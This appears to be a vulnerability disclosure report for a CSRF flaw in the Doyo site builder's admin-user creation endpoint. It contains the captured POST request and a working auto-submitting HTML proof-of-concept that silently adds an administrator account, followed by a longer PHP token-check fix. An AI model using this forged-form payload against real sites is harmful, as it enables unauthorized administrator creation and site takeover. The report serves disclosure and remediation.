2015-03-13: Details reported to the vendor; awaiting vendor handling
2015-03-18: Vendor chose to ignore the vulnerability; details opened to third-party security partners
2015-05-12: Details disclosed to core white hats and experts in related fields
2015-05-22: Details disclosed to regular white hats
2015-06-01: Details disclosed to intern white hats
2015-06-16: Details disclosed to the public

CSRF vulnerability in the latest version of Doyo site builder allows adding an administrator

Add an administrator from the admin backend while capturing the request in Burp, to see how the submitted data reaches the database:
POST /doyo/admin.php?c=a_adminuser&a=add&run=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/doyo/admin.php?c=a_adminuser&a=add
Cookie: 33b5b_lastpos=other; 33b5b_ol_offset=98; 33b5b_ipstate=1425863599; 33b5b_cloudClientUid=9998101; 33b5b_jobpop=0; 33b5b_threadlog=%2C2%2C; editmode=0; 33b5b_readlog=%2C1%2C2%2C; 33b5b_bubble=a%3A1%3A%7Bs%3A17%3A%22pw_all_tip_tucool%22%3Bi%3A1%3B%7D; 33b5b_winduser=VT8BVwBcUlFTUgZQDl8FVQYNXwAABlRTXAZRAgdQWgwFUT4; 33b5b_ck_info=%2F%09; 33b5b_lastvisit=951%091425870595%09%2Fphpwind%2Fapps.php%3Fqweibo%26ajax1%26docomment%26nowtime1425870595548%26verify407e3b64ee9472c6; hd_sid=evILzk; AJSTAT_ok_times=1; tp_sid=6f35b5130ed53007; CNZZDATA1702264=cnzz_eid%3D544880126-1426140871-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1426140871; PHPSESSID=eisqmk9g8iv1a4cqnv5oggm2h4; _currentUrl_=czo0OToiL3l1ZnVjbXMvYWRtaW4vaW5kZXgucGhwP209cGhvdG8mYT1pbmRleCZjYXRpZD00NCI7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 64

auid=&auser=test1&apass=123456&gid=1&level=1&aname=&amail=&atel=

When the account is created, the form data is POSTed directly to that endpoint:
auid=&auser=test1&apass=123456&gid=1&level=1&aname=&amail=&atel=
and the response then redirects to:
http://127.0.0.1/doyo/admin.php?c=a_adminuser&a=add
Nothing in that flow ties the request to the logged-in user's session (no token or similar check), so we can construct a PoC.
The PoC is as follows:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>OWASP CRSFTester Demonstration</title>
</head>
<body onload="javascript:fireForms()">
<script language="JavaScript">
var pauses = new Array( "125" );
function pausecomp(millis)
{
  var date = new Date();
  var curDate = null;
  do { curDate = new Date(); }
  while(curDate-date < millis);
}
function fireForms()
{
  var count = 1;
  var i=0;
  for(i=0; i<count; i++)
  {
    document.forms[i].submit();
    pausecomp(pauses[i]);
  }
}
</script>
<H2>OWASP CRSFTester Demonstration</H2>
<form method="POST" name="form0" action="http://127.0.0.1:80/doyo/admin.php?c=a_adminuser&a=add&run=1">
<input type="hidden" name="auid" value=""/>
<input type="hidden" name="auser" value="test"/>
<input type="hidden" name="apass" value="123456"/>
<input type="hidden" name="gid" value="1"/>
<input type="hidden" name="level" value="1"/>
<input type="hidden" name="aname" value=""/>
<input type="hidden" name="amail" value=""/>
<input type="hidden" name="atel" value=""/>
</form>
</body>
</html>
Add a token check.
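The following is an added example of the token check recommended above, written for this report and not taken from Doyo's own source. It implements the synchronizer-token pattern for the a_adminuser add action: a per-session random token is embedded in the admin form as a hidden field and compared, in constant time, against the session copy before the new administrator is written. The field name csrf_token, the function names, and the assumption that $_SERVER['SERVER_NAME'] holds the site's own host are all illustrative choices, not Doyo identifiers.

```php
<?php
// Added example for this report, not Doyo code. Hardens
// admin.php?c=a_adminuser&a=add&run=1 against the CSRF shown above.
session_start();

// Issue one unpredictable token per session and keep it server-side.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32)); // 64 hex chars
    }
    return $_SESSION['csrf_token'];
}

// Compare the token submitted with a state-changing request against the
// session copy. hash_equals() keeps the comparison constant-time.
function csrf_verify(?string $submitted): bool
{
    if (empty($_SESSION['csrf_token']) || $submitted === null) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Defence in depth: a form auto-submitted from another site carries that
// site's Origin header, so reject an Origin whose host is not ours.
// Assumption: SERVER_NAME is configured to the site's canonical host.
function same_origin(array $server): bool
{
    if (empty($server['HTTP_ORIGIN'])) {
        return true; // Origin absent (e.g. older browsers): rely on the token
    }
    $host = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
    return is_string($host) && $host === $server['SERVER_NAME'];
}

// Hardened handler for the vulnerable flow: the report shows auser/apass/
// gid/level taken straight from $_POST with no session binding.
function handle_add_admin(): void
{
    if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
        http_response_code(405);
        exit('method not allowed');
    }
    if (!same_origin($_SERVER) || !csrf_verify($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        // Log the rejection so a CSRF attempt against an admin is visible.
        error_log('CSRF check failed on a_adminuser add from ' . $_SERVER['REMOTE_ADDR']);
        exit('invalid request');
    }
    // Only now validate auser/apass/gid/level and insert the admin row.
}

// The legitimate add-user form must carry the token as a hidden field;
// a page on another origin cannot read it, so its forged POST fails above.
function render_add_form(): string
{
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="POST" action="admin.php?c=a_adminuser&a=add&run=1">'
         . '<input type="hidden" name="csrf_token" value="' . $t . '">'
         . '<input name="auser"><input name="apass" type="password">'
         . '<button>Add</button></form>';
}
```

The token, not the Origin check, is the real control: the forged form in the PoC above is submitted by the victim's browser with the victim's cookies, but the attacker's page has no way to read the session-bound csrf_token value, so the request is rejected before any row is inserted. On PHP 7.3 or later, setting the session cookie to SameSite=Lax via session_set_cookie_params() adds a further layer, since the browser then withholds the cookie from cross-site POSTs such as this one.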
Severity: no impact (vendor ignored)
Ignored at: 2015-06-16 15:25
None for now